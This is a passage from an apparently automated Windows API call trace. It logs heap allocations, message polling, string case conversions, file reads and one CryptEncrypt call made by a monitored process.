lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0243.042] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0243.042] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0243.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0243.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0243.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0244.143] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3ed0020*, pdwDataLen=0x8bef68*=0x100000, dwBufLen=0x100000 | out: pbData=0x3ed0020*, pdwDataLen=0x8bef68*=0x100000) returned 1 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0244.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0244.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0244.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0244.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0244.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0244.191] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.191] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0244.191] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0244.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0244.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0244.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0244.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0244.193] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.193] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.193] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.194] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.194] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0244.194] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.194] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.194] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.194] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.194] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.195] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.195] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0244.195] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.195] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.195] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.195] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.195] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0244.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.196] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.244] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.245] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0244.254] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0244.255] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x6775, lpOverlapped=0x0) returned 1 [0244.256] ReadFile (in: hFile=0x2a0, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0244.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26775) returned 0x24b7a48 [0244.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x37c0020 | out: hHeap=0x25c0000) returned 1 [0244.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0244.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0244.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0244.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26775) returned 0x34c2258 [0244.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0244.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.268] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26775) returned 0x24b7a48 [0244.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0244.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0244.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0244.269] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0244.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0244.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26775) returned 0x24b7a48 [0244.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0244.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0244.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0244.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0244.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0244.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0244.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26775) returned 0x34e89d8 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0244.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0244.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0244.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.274] RtlAllocateHeap 